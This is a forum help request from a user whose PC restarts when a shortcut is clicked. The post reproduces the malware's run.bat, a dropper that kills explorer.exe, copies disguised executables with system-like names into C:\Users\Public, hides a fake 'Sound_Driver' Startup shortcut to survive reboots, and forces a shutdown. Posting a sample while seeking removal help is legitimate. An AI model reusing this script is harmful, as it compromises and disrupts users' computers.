xpress_embedo
Advanced Member level 4
Please tell me how to remove this virus from my computer, whenever i am clicking on shortcut file my computer restarts, i am using avast free antivirus but it doesn't detects it as virus.
Here is the code of the run.bat file
I tried deleting these but they reappear.
Here is the code of the run.bat file
I tried deleting these but they reappear.
Code Bash - [expand] 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 path C:\Windows\System32 color fa IF EXIST "C:\Users\Public\smss .exe" ( ECHO ) ELSE (taskkill /f /im explorer.exe xcopy /h /y "smss .exe" "C:\Users\Public") IF EXIST "C:\Users\Public\taskeng .exe" ( ECHO ) ELSE (xcopy /h /y "taskeng .exe" "C:\Users\Public") IF EXIST "C:\Users\Public\Firewall.exe" ( ECHO ) ELSE (xcopy /h /y "Firewall.exe" "C:\Users\Public") IF EXIST "C:\Users\Public\Firewall .exe" ( ECHO ) ELSE (xcopy /h /y "Firewall .exe" "C:\Users\Public") IF EXIST "C:\Users\Public\explorer.exe" ( ECHO ) ELSE (xcopy /h /y "explorer.exe" "C:\Users\Public") IF EXIST "C:\Users\Public\explorer .exe" ( ECHO ) ELSE (xcopy /h /y "explorer .exe" "C:\Users\Public") IF EXIST "C:\Users\Public\Interop.IWshRuntimeLibrary.dll" ( ECHO ) ELSE (xcopy /h /y Interop.IWshRuntimeLibrary.dll "C:\Users\Public") IF EXIST "%systemroot%\Microsoft.NET\Framework\v3.*" goto 3 IF EXIST "%systemroot%\Microsoft.NET\Framework\v4.*" goto 4 :3 IF EXIST "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Driver.lnk" ( ECHO "hur" ) ELSE ( attrib "Sound_Driver.lnk" -h -s copy /y Sound_Driver.lnk "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" attrib "Sound_Driver.lnk" +h +s attrib "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Driver.lnk" -h -s shutdown /s /f /t 0 ) goto e :4 IF EXIST "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Drivers.lnk" ( ECHO "hur" ) ELSE ( attrib "Sound_Drivers.lnk" -h -s copy /y Sound_Drivers.lnk "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup" attrib "Sound_Drivers.lnk" +h +s attrib "C:\Users\%username%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sound_Drivers.lnk" -h -s shutdown /s /f /t 0 ) :e